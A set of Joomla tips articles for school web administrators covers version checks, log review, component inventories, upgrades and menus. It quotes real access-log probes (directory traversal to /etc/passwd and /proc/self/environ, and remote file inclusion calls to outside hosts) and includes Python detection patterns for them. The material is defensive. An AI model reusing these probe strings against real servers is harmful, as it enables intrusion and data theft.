Joomla! TIPS
How to check version of Joomla when ...
Written by Ken Task
Friday, 16 July 2010 05:55
one doesn't have Admin login:

fgrep '$RELEASE' /var/www/html/libraries/joomla/version.php;
fgrep '$DEV_LEVEL' /var/www/html/libraries/joomla/version.php

This will show the release version (like 1.5) and the patch (.##) level.

http://www.joomla.org/announcements/release-news/
http://docs.joomla.org/Upgrade_Instructions
http://docs.joomla.org/Category:Version_1.5.19_FAQ
http://docs.joomla.org/Vulnerable_Extensions_List


 
IF you run a Joomla ...
Written by Ken Task
Wednesday, 02 June 2010 18:10
Often when discussing/cussing the security of operating systems, Windows folks point out that the most popular one will draw the attention of those who would do harm, because there's more 'bang for the buck'.  That's true of open source apps too.  And, since many ISDs have firewalls, port 80 is one of the few open ports into the inner ISD network.  Thus, any Joomla, and anything else on port 80, is a potential target.  Now that school is out … maybe little johnny hacker will be more inclined to try out some stuff, too!

Got Joomla with some add-ons installed?  When's the last time you checked the versions of those add-ons?
When's the last time you paid attention to logwatch reports (the web server section) and investigated?
Might be time you did!  There are active scans/probes looking for weak/vulnerable add-ons to Joomla, and IF your Joomla is not up to the latest version 1.5.18 and IF those add-ons have issues, your site is in danger of getting rootkitted.

The following is for Linux boxen with Webmin installed.

How to check activity:
1. Log in to your Webmin.
2. Go to System -> System Logs.
3. Click the "view" link for the /var/log/httpd/access_log line.
4. The view will show the last 20 lines of that log.
5. To see what/who is probing your server, change the "Last" number from 20 to 200000, and in the "Only show lines with text" box type: ../../../
6. Then click "Refresh".

First … DON'T PANIC!  You might be seeing just a probe and your server is NOT in danger at all.
BUT, some investigation is in order, for if they point to a vulnerable add-on, you might have a problem.


What you'll see is something like below:

137.118.32.10 - - [23/May/2010:08:27:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"


Explanation:
Note that in the example above, the server returned 404 responses.  404 means "not found".  But, given the example, that could be because the server from which this clip was taken isn't running the Joomla add-on com_fabrik.  Also note that it was probing for /proc/self/environ, which is just information … but information they shouldn't be seeing anyway, so there is reason for concern.

Any activity such as above is bad, but here's an example of ones that should raise your eyebrows!

174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_docman=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"


Explanation:
Again note: 404's, but notice what they are seeking … /etc/passwd.
Now we're getting more serious, huh?

Lines like this one could indicate a problem:

121.190.102.21 - - [21/May/2010:07:25:13 -0500] "GET /////////?cmd&file=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 200 30597 "-" "Mozilla/5.0"

or this one:

65.60.53.122 - - [31/May/2010:11:18:55 -0500] "GET /////////?cmd&file=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 29958 "-" "Mozilla/5.0"

NOTE: 200 code … in this case, that's not good.
bellschool.net is another Joomla located overseas.
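Here is an added example (my own, not code from this article, Webmin or Joomla) that does the same sifting as the Webmin steps above, but over a whole access_log at once and with the distinctions the explanations make: traversal probes for /proc/self/environ or /etc/passwd that got a 404 are rated MEDIUM, a probe or a ?file=http://... remote-include request that got a 200 is rated HIGH, and a plain libwww-perl hit with no probe pattern is LOW. The log lines in SAMPLE_LOG are constructed (RFC 5737 addresses and a reserved .invalid host), not taken from any real server.

```python
"""Triage Apache access_log lines for the probe patterns discussed above.

Added example, not part of the original article. SAMPLE_LOG is constructed
data (RFC 5737 addresses, reserved .invalid host), not real traffic.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" log format; the request path runs up to the first
# space inside the quoted request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators matched against the URL-decoded request path.
PATH_INDICATORS = [
    ("traversal", re.compile(r"\.\./")),
    ("proc-environ", re.compile(r"/proc/self/environ")),
    ("etc-passwd", re.compile(r"/etc/passwd")),
    ("remote-include", re.compile(r"[?&]file=https?://", re.IGNORECASE)),
]

SAMPLE_LOG = """\
192.0.2.10 - - [23/May/2010:08:27:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
192.0.2.20 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_docman=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
192.0.2.30 - - [21/May/2010:07:25:13 -0500] "GET /////////?cmd&file=http://example.invalid/1.txt??? HTTP/1.1" 200 30597 "-" "Mozilla/5.0"
192.0.2.40 - - [21/May/2010:07:30:00 -0500] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8765 "-" "Mozilla/5.0"
192.0.2.50 - - [21/May/2010:07:31:00 -0500] "GET /robots.txt HTTP/1.1" 200 120 "-" "libwww-perl/5.834"
"""


def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Rate one parsed entry: None for ordinary traffic, else (severity, indicators).

    HIGH   - probe pattern in the path AND a 200 (the server answered it)
    MEDIUM - probe pattern in the path, any other status (404: component absent)
    LOW    - only the libwww-perl agent, no probe pattern
    """
    path = unquote(entry["path"])  # decode %-escapes such as the trailing %00
    indicators = [name for name, rx in PATH_INDICATORS if rx.search(path)]
    scanner_agent = entry["agent"].lower().startswith("libwww-perl")
    if scanner_agent:
        indicators.append("libwww-perl")
    if indicators and indicators != ["libwww-perl"]:
        severity = "HIGH" if entry["status"] == "200" else "MEDIUM"
    elif scanner_agent:
        severity = "LOW"
    else:
        return None
    return severity, indicators


def triage(lines):
    """Run classify() over raw log lines; one finding dict per hit."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # malformed line: skip rather than abort on a big log
        rated = classify(entry)
        if rated is None:
            continue
        severity, indicators = rated
        findings.append({"ip": entry["ip"], "status": entry["status"],
                         "severity": severity, "indicators": indicators,
                         "path": unquote(entry["path"])})
    return findings


def by_source(findings):
    """Findings per source IP: the view you need before any deny/allow decision."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG.splitlines())
    for f in results:
        print("%-6s %-12s %s -> %s" % (f["severity"], f["ip"], f["status"],
                                       ", ".join(f["indicators"])))
    print(by_source(results))
```

To run it over a real log, replace the sample with `triage(open("/var/log/httpd/access_log"))`; anything rated HIGH deserves the same look the 200-coded lines above get, and by_source() gives the per-address counts that decide whether an IP range is worth blocking.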

Solutions:

1. Make sure that any com_ component you see installed is at its latest version.
IF it is not the latest version and you can't find an update for it, consider removing the component/add-on.

2. You could also start either:
a. using .htaccess deny/allow to block IP ranges, or maybe entire countries, from accessing your web server.
b. checking into mod_rewrite rules for libwww-perl, to deny or return "gone" responses to requests whose user agent identifies itself as libwww-perl.

See:
Time for some Joomla Spring Cleaning?
SOSSIG
http://sos.tcea.org/index.php?option=com_content&view=article&id=540:time-for-some-joomla-spring-cleaning&catid=96:joomla-tips&Itemid=338
or SOSTX
http://www.sosoftexas.org/joomla15/index.php?option=com_content&view=article&id=466:time-for-some-joomla-spring-cleaning&catid=71:joomla-tips&Itemid=201

for more info and links.

 
Time for some Joomla Spring Cleaning?
Written by Ken Task
Wednesday, 02 June 2010 11:13
For those of you that run Joomla's, might want to add this to your list of things to do on a regular basis.

Joomla core is normally secure and easy to update with the update component installed (JUpdateMan).  That component, however, won't update all that you might have added.  As such, please consider checking this resource:

http://secunia.com/advisories/search/?search=joomla

It will show which 3rd party add-on components have issues.
First, of course, it might be a good idea to note what add-ons you've installed.  Log in to the Admin side.  Go to Extensions, Install/Uninstall, then the tab for Components.  You'll see a listing which shows name, version numbers, and Author.  Those that show "Joomla Project" are core.  3rd party components might show the author's name or provide a non-clickable URL.  Holding the mouse over the author name will render a pop-up tool tip showing the URL to the web site and the author's email address.

The fixes might be simple if the 3rd party add-on is still being maintained - just install the latest/most secure version.  IF it doesn't appear there is an updated version, best to remove it.  Don't forget, if you were using it, removing it may not be possible until you un-link it from your menus; and if it does remove with no warning, you might have broken some link in your menus.

Set the display of components to "all", then print to a PDF file for future checking.
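An added example (my own, not part of this article or of Joomla) that builds that inventory straight from the web root, combining the version.php check from "How to check version of Joomla when ..." above with a read of each component's install manifest, so you get the core version plus the list of third-party components without logging in. It assumes the stock Joomla 1.5 layout: libraries/joomla/version.php holding the $RELEASE and $DEV_LEVEL assignments, and each component's manifest at administrator/components/com_*/<name>.xml with <name>, <version> and <author> elements; anything whose author is not the Joomla project is treated as third-party. The sample site it writes to a temporary directory is constructed data (sample versions and vendor names), not a real install.

```python
"""Inventory a Joomla 1.5 install from the filesystem, without Admin login.

Added example, not part of the original article. Assumes the stock 1.5
layout described in the lead-in; build_sample_site() writes constructed
sample files to a temporary directory so the script runs offline.
"""
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

CORE_AUTHOR = "Joomla! Project"


def core_version(webroot):
    """Return "RELEASE.DEV_LEVEL" (e.g. "1.5.18") from libraries/joomla/version.php,
    the same two assignments the fgrep commands print."""
    text = (Path(webroot) / "libraries" / "joomla" / "version.php").read_text()
    parts = []
    for name in ("RELEASE", "DEV_LEVEL"):
        m = re.search(r"\$" + name + r"\s*=\s*'([^']*)'", text)
        if m is None:
            raise ValueError("no $%s assignment in version.php" % name)
        parts.append(m.group(1))
    return ".".join(parts)


def behind_latest(installed, latest):
    """True if installed < latest, compared numerically part by part (1.5.9 < 1.5.18)."""
    as_tuple = lambda v: tuple(int(p) for p in v.split("."))
    return as_tuple(installed) < as_tuple(latest)


def component_manifests(webroot):
    """Yield (folder, name, version, author) for each component install manifest."""
    comp_dir = Path(webroot) / "administrator" / "components"
    for xml_file in sorted(comp_dir.glob("com_*/*.xml")):
        root = ET.parse(xml_file).getroot()
        # Only install manifests; skip config.xml and other XML in the folder.
        if root.tag not in ("install", "extension") or root.get("type") != "component":
            continue
        text = lambda tag: (root.findtext(tag) or "").strip()
        yield xml_file.parent.name, text("name"), text("version"), text("author")


def third_party_components(webroot):
    """Components whose manifest names someone other than the Joomla project:
    the ones to look up on the advisory sites and to remove if unmaintained."""
    return [c for c in component_manifests(webroot) if c[3] != CORE_AUTHOR]


def build_sample_site():
    """Constructed stand-in for /var/www/html with sample (not real) values."""
    root = Path(tempfile.mkdtemp(prefix="joomla-sample-"))
    lib = root / "libraries" / "joomla"
    lib.mkdir(parents=True)
    (lib / "version.php").write_text(
        "<?php\nclass JVersion {\n"
        "\tvar $PRODUCT   = 'Joomla!';\n"
        "\tvar $RELEASE   = '1.5';\n"
        "\tvar $DEV_LEVEL = '18';\n"
        "\tvar $DEV_STATUS = 'Stable';\n}\n")
    samples = {  # folder: (name, version, author); constructed sample data
        "com_fabrik": ("Fabrik", "0.0.1-sample", "Sample Vendor A"),
        "com_docman": ("DOCman", "0.0.2-sample", "Sample Vendor B"),
        "com_sample": ("Sample Core Component", "1.5.0", CORE_AUTHOR),
    }
    for folder, (name, version, author) in samples.items():
        d = root / "administrator" / "components" / folder
        d.mkdir(parents=True)
        (d / (folder[4:] + ".xml")).write_text(
            '<?xml version="1.0" encoding="utf-8"?>\n'
            '<install type="component" version="1.5.0">\n'
            f'  <name>{name}</name>\n  <author>{author}</author>\n'
            f'  <version>{version}</version>\n</install>\n')
        (d / "config.xml").write_text('<?xml version="1.0"?>\n<config/>\n')
    return root


if __name__ == "__main__":
    site = build_sample_site()
    v = core_version(site)
    print("core:", v, "(behind 1.5.18)" if behind_latest(v, "1.5.18") else "(current)")
    for folder, name, version, author in third_party_components(site):
        print("third-party:", folder, name, version, "by", author)
```

Against a real server, call core_version("/var/www/html") and third_party_components("/var/www/html") instead of building the sample; the folder names and versions it prints are what you search for on the Secunia and Vulnerable Extensions pages linked above.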

Another very good resource for checking all kinds of open source software vulnerabilities:
http://www.exploit-db.com/

It's a jungle out there, isn't it? :(
 
Upgrading Joomla 1.0.12 to 1.0.13
Written by Ken Task
Tuesday, 24 July 2007 04:11
Seems an upgrade has quietly "sneaked" out without much fanfare due to events like Austin's JoomlaDay and the release of Joomla!1.5 RC.   IT DOES CONTAIN SOME SECURITY FIXES AND IS RECOMMENDED.  I have tested on a couple of sites and the patch has not produced any problems.

Joomla does warn that once you upgrade to this version, you will not be able to roll it back, so it is strongly advised one make a complete and total backup of not only the web site, but the databases as well.

Please use the index of this article to access desired area.


How to backup webroot:
This is *best done from the command line* ... [directions are via ssh (remote), but it can also be done via Terminal while logged onto the server as the root user].  The backup of the database is best done via Webmin.

1. ssh to server and login - su to root

2. cd /var/www/html [ENTER]

3. tar -cvf joomlabackup.tar ./* [ENTER]
(this will create a joomlabackup.tar file in /var/www/html/ directory retaining permissions on all files and folders.  Suggest you download to your workstation via web browser but leave the tar file there in case you have to "restore" the site after upgrade.)


Backup of database via Webmin
1. launch browser and logon to your Webmin: https://[your_server]:10000

2. Servers -> MySQL

3. Open the database for Joomla (double-click its icon)

4. in the resulting screen it will complain about having too many tables to display and you will see a search screen.  Look at the bottom row of buttons and click the "Backup Database".

5. in the resulting screen, "backup to file" dialog box, type:

/var/www/html/[yourdatabasename].sql

where [yourdatabasename] IS your joomla database name ... hint, you can also see the database name in the description paragraph just above the dialog boxes.

Example: my Joomla database is called "joomla" so the sql file name is "joomla.sql"

6. Scroll to the bottom of the form, and click the "Save and backup now" button.

7. As you did with the tar ball, suggest you open a browser window and download the SQL file to your local workstation.

** NOTE: if you have multiple Joomla installs (per campus) follow the same procedure above for ALL Joomla databases.


How to upgrade from 1.0.12 to 1.0.13

A GUI way - with JoomlaXplorer

I'd highly recommend Joomla! users get JoomlaXplorer.  This tool will allow you to upgrade without any command line.

1. Download the patch:
http://joomlacode.org/gf/download/frsrelease/5097/13408/Joomla_1.0.12_to_1.0.13-Stable-Patch_Package.tar.gz

2. Using a browser, go to your Joomla's admin backend

3. Assuming you have JoomlaXplorer installed, go to the components menu, JoomlaXplorer.

4. make sure you are in the web root folder ... JoomlaXplorer will see one level up from web root.

5. upload the patch tar.gz file to the web root.

6. In JoomlaXplorer, click the check box on the line that shows the patch file, then click the "unarchive" button.  You will get a warning prompt.  Click OK.

7. After the file is untarred/gunzipped, the patch is complete and you can safely remove the patch tar.gz file.

8. In the Administrator interface, go to "Home" and look at the bottom of the display to see if the version now says 1.0.13.

NOTE: there is now an addition in Site, Global Configuration, Server tab to set
"Register Globals Emulation" to OFF (NOT ON).  Don't forget to save that change!

Suggest you logout and then log back in again ... front end as well as back end
to assure yourself that all is well! ;)


Done!

NOTE: if you have multiple Joomla installations (per campus) repeat the above for EACH Joomla installation.


Command line way
(ssh [remote] is described, but one can do same from terminal window while sitting at the keyboard of the server itself):

1. ssh into server and su to root

2. cd /var/www/html/ (assuming this is your Joomla! web root).

3. wget http://joomlacode.org/gf/download/frsrelease/5097/13408/Joomla_1.0.12_to_1.0.13-Stable-Patch_Package.tar.gz [ENTER]

4. tar zxvf *.tar.gz [ENTER]

5. chown apache:apache * -R [ENTER] (DON'T SKIP THIS STEP).

6. launch a web browser and go to your Joomla's administrator backend.  After logging on, look at the bottom of the display to see version.

In either case, suggest you surf your site to assure yourself that all is well!

NOTE: if you have multiple Joomla installations (per campus) repeat the above for EACH Joomla installation.



*** THIS IS VERY IMPORTANT! ***
IF YOU HAVE PREVIOUSLY INSTALLED JOOMLA ACCESS CONTROL LIST YOU MUST ACQUIRE THE UPGRADE/FIX/PATCH FROM THE MAKER OF JOOMLA ACCESS CONTROL LIST.  DO NOT ATTEMPT TO APPLY THE PATCH FROM JOOMLA.ORG.


Note: I've checked the JACL site and have not seen a patch available for upgrading to 1.0.13.  Please use the contact form on the JACL web site to inquire with the author.
http://www.byostech.com/component/option,com_contact/catid,3/Itemid,3/

JACL Main web site:
http://www.byostech.com/



If you need assistance, please call or EMail.  IF I am to remotely assist, I need:

1. access to your installed Webmin (port 10000 must be opened in your firewall)

2. an administrative level account on your Joomla
(note: if JoomlaXplorer is NOT installed, I need your permission to install and you might still need to change permissions on certain folders on your server for me to be able to use it remotely).



 
Using the Joomla! Content Editor's HTML templates plugins.
Written by Ken Task
Monday, 11 September 2006 06:08
Joomla! CMS is a very flexible CMS.  Not only does one have site templates (which can be assigned to Section/Content area of Joomla! - ie, the template changes with the content), but one may also develop their own "templates" for content categories.

Take the following scenario and example:

We have an Elementary Section and a Category specifically for Elementary content.
The campus wants to "push" as much as it can into a category in its content called "Parent Letters".   The parent letters are sent home with the students every week and are a summary of what each grade is doing, concentrating upon, etc.
(Goliad ISD does this).

The Parent Letter has the following sections:
* Title with the date
* a logo
* a section for Special Announcements
* a section for Reminders
* a section for each Curricular area: Math, Science, Reading, Writing, and so on ...
* at the bottom a set of navigational links or anything one desires.
(this is all placed into an HTML table with "hints" like "Title: replace me" or "add content here").

Each Elementary submitter then does NOT have to "re-invent the wheel" and every Parent Letter that is online follows a similar format! :)

IF one has the JCE HTML plugins loaded into the JCE Editor, here's a how-2:

1. begin a new article

2. build your table with the characteristics as mentioned above - or anyway you desire.

3. press the return key a few times to open some space above your "footer".

4. Now to save the template.  Click the "save template" button in the JCE editor and make sure you save it in the "templates" folder with a descriptive name, something like "parentletter".  The editor will add the file name extension .html for you.

5. Cancel the new article you've begun.

Next time an Elementary teacher logs on to create a Parent Letter, they just have to load the template (parentletter), fill in the table with appropriate content, set to publish, and save. Done, for another week ... and it's taken just a few minutes time.

Screen shots (illustrations):

Menu example - shows links to Parent Letter Blogs
(screenshot: joomlamenuexample)

The JCE Editor's icons for Templates:
(screenshot: jcehtmltemplateicons)

Selecting or saving the template:
(screenshot: insertingtemplate)

Previewing Template:
(screenshot: previewoftemplate)

BTW, creating it online FIRST gives one the advantages in:

* creating a PDF file of the article on the fly (click the PDF icon when viewing the article).

* EMailing the article to a distribution list of parents.
IF one has Acajoom NewsLetters installed in Joomla, the teacher can create a new submission and distribute to all parents that have subscribed!  One less item for the "forgetful child" to lose! :)

* Printing X number of copies of the article for sending home with students.

Since, in Joomla!, these areas have been set up as "blogs", the most recent Parent Letter is listed first AND all the previous weeks' Parent Letters are still accessible!

Visit GISD's GES area to see the output ... right now there is only 2nd Grade.

http://labahia.goliadisd.org/joomla/index.php?option=com_content&task=blogcategory&id=71&Itemid=161




 
Joomla! Menus
Written by Ken Task
Monday, 11 September 2006 02:35
For those of you that have already become Joomla! Experts, this is NOT something new to you, but to those of us that take a little longer to "catch on" (like me!), it might be! ;)

In Joomla! CMS one can create versions of menus and have them display only on certain Section/Categories.  In other words, the menus can change.

Take for example a High School Joomla! whose organization is by curricular areas - one Section content area for, say, "Social Studies" and several Categories under it such as "Civics", "Economics", "World History", "American History", etc.

One could have a link on the main menu for "Curriculum" which, when clicked upon, basically clears the main menu of the site and presents a menu of curriculum areas - one of which is "Social Studies".  Clicking "Social Studies" drops an expanded menu showing all the "categories" under that section, as well as displaying a "Social Studies" Department "home page".

Yes, this does take more time in configuring the site, but when finished the Joomla!Master has accomplished a couple of things:
1. viewers are directed to the "beef" and a "focus" is set according to their selection
2. saved some "screen territory" ... a precious commodity ... as it is a fact that most "surfers" won't scroll down a screen very far at all.

You might visit the SOS Joomla! web site for a "working" example.
http://www.sosoftexas.org/
Items of interest: SOS Menu, SOS Web Links.

Goliad ISD's Joomla! (under development) is another good example:
http://labahia.goliadisd.org/joomla/
GISD, GHS, GMS, GES have their own menus.
NOTE: the link above may eventually break when the site goes live!  In the event it has gone live, just strip out the /joomla/ in the URL and TIA (try it again!).  Also, let me know about the broken link and I'll correct it.

Some "out there" might be thinking, "drop down-extended menus" would do the same and are "better".  Well, that might be true ... it all depends upon your ISD's "accessibility compliance" (how well vision-impaired screen readers can handle the "drop down-extended menus").

For more information about accessibility issues, please see the National Center on Disability and Access to Education site at:
http://ncdae.org/tools/factsheets/cms.cfm

Note: Joomla! is specifically mentioned ... as well as Moodle.
Joomla: http://help.joomla.org/content/view/805/125/
Moodle: http://docs.moodle.org/en/Accessibility

On a related note: many web sites use links to Word documents, PowerPoint, and PDF.  The National Center site above specifically addresses those as well:
Word: http://ncdae.org/tools/factsheets/word.cfm
PowerPoint: http://ncdae.org/tools/factsheets/powerpoint.cfm
PDF: http://ncdae.org/tools/factsheets/pdf.cfm

 